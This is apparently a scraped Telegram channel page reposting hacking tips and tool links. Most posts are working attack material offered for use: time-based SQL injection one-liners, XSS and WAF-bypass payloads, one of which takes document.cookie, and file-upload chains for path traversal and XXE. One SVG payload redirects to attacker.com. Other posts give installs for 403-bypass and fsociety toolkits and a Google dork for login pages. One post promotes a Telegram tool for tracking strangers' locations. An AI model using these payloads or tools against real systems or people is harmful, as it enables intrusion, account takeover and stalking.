Termux All Command [Telegram Group] - إحصائيات وتحليلات قناة تيليجرام @termuxcommandfull

1 185

🩸Top Digital Forensics Tools 🧬Network Forensic Tools - Nmap - Wireshark - Xplico - Snort - TCPDump - The Slueth Kit 📱Mobile Forensics Tools - Elcomspoft iOS Forensic Toolkit - Mobile Verification Toolkit - Oxygen Forensic - MOBILedit - Cellebrite UFED - MSAB XRY ☢️Malware Analysis Tools - Wireshark - YARA - Malwarebytes - VirusTotal - Cuckoo Sandbox - IDA Pro 🗃️Data Recovery Tools - Recuva - EaseUS Data Recovery - TestDisk - Stellar Data Recovery - PhotoRec - Disk Drill ✉️Email Forensic Tools - MailXaminer - MailPro+ - Xtraxtor - Aid4Mail - eMailTrackerPro - Autopsy 🔍OSINT Tools - Maltego - Nmap - OSINT Framework - Shodan - Recon-ng - TheHavester ⚠️Live Forensics Tools - OS Forensics - Encase Live - CAINE - F-Response - Kali Linux Forensic Mode 📥Memory Forensics Tools - Volatility - DumpIt - memDump - Access data FTK Imager - Hibernation Recon - WindowSCOPE ☁️Cloud Forensic Tools - Magnet AXIOM - MSAB XRY Cloud - Azure CLI 🔖#infosec

1 185

Run 403 Bypass from anywhere Steps: sudo git clone https://lnkd.in/grpRHnWv /opt/4-ZERO-3 sudo chmod +x /opt/4-ZERO-3/403-bypass.sh sudo ln -sf /opt/4-ZERO-3/403-bypass.sh /usr/local/bin/403-bypass 403-bypass -h 403-bypass -u https://lnkd.in/g4t9cuEz --exploit

1 185

Find critical vulnerabilities like SQLi: Commands: 1. waymore -i http://testphp.vulnweb.com -n -mode U | tee waymore.txt 2. cat waymore.txt | gf sqli | nuclei -tags sqli -dast hashtag#ethicalhacking hashtag#sqli hashtag#bugbounty hashtag#oneliner hashtag#nuclei hashtag#waymore

1 185

$𝗧𝗶𝗺𝗲 𝗯𝗮𝘀𝗲𝗱 𝗦𝗤𝗟 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝘂𝘀𝗶𝗻𝗴 𝘄𝗮𝘆𝗯𝗮𝗰𝗸𝘂𝗿𝗹𝘀 waybackurls https://TARGET.COM | grep -E '\bh$

𝗧𝗶𝗺𝗲 𝗯𝗮𝘀𝗲𝗱 𝗦𝗤𝗟 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝘂𝘀𝗶𝗻𝗴 𝘄𝗮𝘆𝗯𝗮𝗰𝗸𝘂𝗿𝗹𝘀 waybackurls https://TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/$=[^&]*$/=/g' | tee urls.txt | sort -u -o urls.txt cat urls.txt | sed 's/=/=(CASE%20WHEN%20(888=888)%20THEN%20SLEEP(5)%20ELSE%20888%20END)/g' | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && time curl "'{}'"'

1 185

Easy XSS Bounty Explained: 1. 🔍 Google Dork: inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:example[.]com 2. 👀 API endpoint: "iframe" parameter name caught my eye. 3. 👾 XSS probe: '">< Try something basic that isn't real XSS, but is least likely to get caught by a WAF or filter. 4. ⚡ Page breaks In this case it was reflected in the DOM and broke the page content in an obvious way. 5. 🛠️ XSS payload '">

6. 🚫 Akamai WAF blocks XSS payload 7. 🔧 Akamai WAF bypass XSS Payload by Rodolfo Assis AKA Brutelogic 1'"> 8. 💥 XSS alert reflected

1 185

Get a remote job using these AI tools ➼ Interview questions – https://interviewgpt.ai ➼ Interview notes – http://metaview.ai ➼ Fix your resume – http://fixmyresume.xyz ➼ Resume scan – http://accio.springworks.in ➼ Job search – http://matchthatroleai.com ➼ Apply automatically – http://applyish.com

1 185

𝗣𝗘𝗡𝗧𝗘𝗦𝗧𝗜𝗡𝗚 𝗡𝗢𝗧𝗘𝗦 💐 >Active Directory •Initial Access •Internal Enumeration & Lateral Movement •Privilege Escalation to Domain Admin using Known Exploits •Domain Trusts >Privilege Escalation •Linux Privilege Escalation •Windows Privilege Escalation >Protocols and Services •DNS/FTP/IMAP •IPMI/MSSQL •MySQL/NFS •Oracle TNS •POP3/RDP •SMB •SMTP/SNMP >Fuzzing >Information Gathering >Utilities, Scripts and Payloads •Shells and Payloads •Metasploit Framework •File Transfers •Pivoting, Tunneling, Port Forwarding •Password Attacks >Web Applications Attacks •File Uploads •HTTP Verb Tampering •Insecure Direct Object References (IDOR) •Local File Inclusion (LFI) •Remote File Inclusion (RFI) •OS Command Injection •Cross Site Scripting (XSS) •SQL Injection •XML External Entities (XXE) >Web Application Technologies •Drupal •Gitlab •CGI Applications •Jenkins •Joomla •Microsoft IIS •osTicket •PRTG Network Monitor •Splunk •Tomcat •WordPress Link 🔗:- https://sfoffo.gitbook.io/sfoffo-pentesting-notes

1 185

Real_World_Bug_Hunting_A_Field_Guide_to_Web_Hacking_by_Peter_Yaworski.pdf6.09 MB

1 185

+9

Evading_EDR_Early_Access_2023.pdf4.93 MB

1 185

webcopilot-main.zip0.17 KB

1 185

WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools. : https://github.com/h4r5h1t/webcopilot

1 185

Google Dork - Login Pages inurl:login | inurl:signin | intitle:login | intitle:signin | inurl:secure site:example[.]com Find hidden login pages and admin panels Vulnerabilities to test for: 🆕 Account Creation 🔐 Default Credentials 🗡️ SQLi Auth Bypass 💪 Brute Force 📬 Password Reset Host Header Poisoning 🕸️ XSS on error or GET params #bugbounty #bugbountytips #cybersecurity #pentesting #seo #google #hacking #appsec

1 185

+1

CCTV_Github.mp415.58 MB

1 185

Please welcome the new surveillance application based on Telegram “Find people nearby” feature – CCTV (Close-Circuit Telegram Vision). You may track people all across the world sitting in your bedroom. It’s not just a simple shot and get people in a 500 meters radius, it’s based on quadrangulation (like triangulation, but using 4 points instead of 3). The accuracy is around 50-150 meters which is more then enough to understand almost the exact person’s location. The application has a real-world map so you can easily observe the country, city and a street. Implemented links allow you to immediately communicate with the person. Enjoy your CCTV data! GitHub link -> https://lnkd.in/dqiF4H53

1 185

🖥Chaining Vulnerabilities through File Upload🖥 SLQi⏳ 'sleep(20).jpg sleep(25)-- -.jpg Path traversal⏳ ../../etc/passwd/logo.png ../../../logo.png XSS⏳ -> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>" -> Upload using .gif file GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//; -> Upload using .svg file <svg xmlns="w3.org/2000/svg" onload="alert(1)"/> -> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("HolyBugx XSS"); </script> </svg> Open redirect ⏳ <code> <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <svg onload="window.location='attacker.com'" xmlns="w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> </svg> </code> XXE ⏳ <?xml version="1.0" standalone="yes"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]> <svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1 <text font-size="40" x="0" y="16">&xxe;</text> </svg>

1 185

🔥New Triaged report Sql Injection 😍 > Payload used time-based poc. ,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW MySQL credit: @Gotcha1G

1 185

☢️ FSOCIETY TOOLKIT ☢️ 🔰 ABOUT TOOL 🔰 If you get to this point, you can assume that you are lucky, now we will install a repository in which all the penetration testing tools have appeared on the Mr.Robot series. 🔰 FEATURES 🔰 ▪️ Information Gathering ▪️ Password Attacks ▪️ Wireless attack ▪️ Sniffing & Spoofing ▪️ Web Hacking ▪️ Private Web Hacking ▪️ Post Exploitation 🔰 INSTALL 🔰 • apt update • apt upgrade • pkg install git -y • pkg install wget -y • pkg install python2 • git clone https://github.com/Manisso/fsociety.git • cd fsociety • chmod +x install.sh • python2 fsociety.py

1 185

1 185

1 185

(Hard filter+Cloudflare bypassed) Stored XSS leads account takeover Payload: xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)> Tips: Always play with input's => reflecting value's tags. even there is waf/cloudflare. #bugbountytip #bugbounty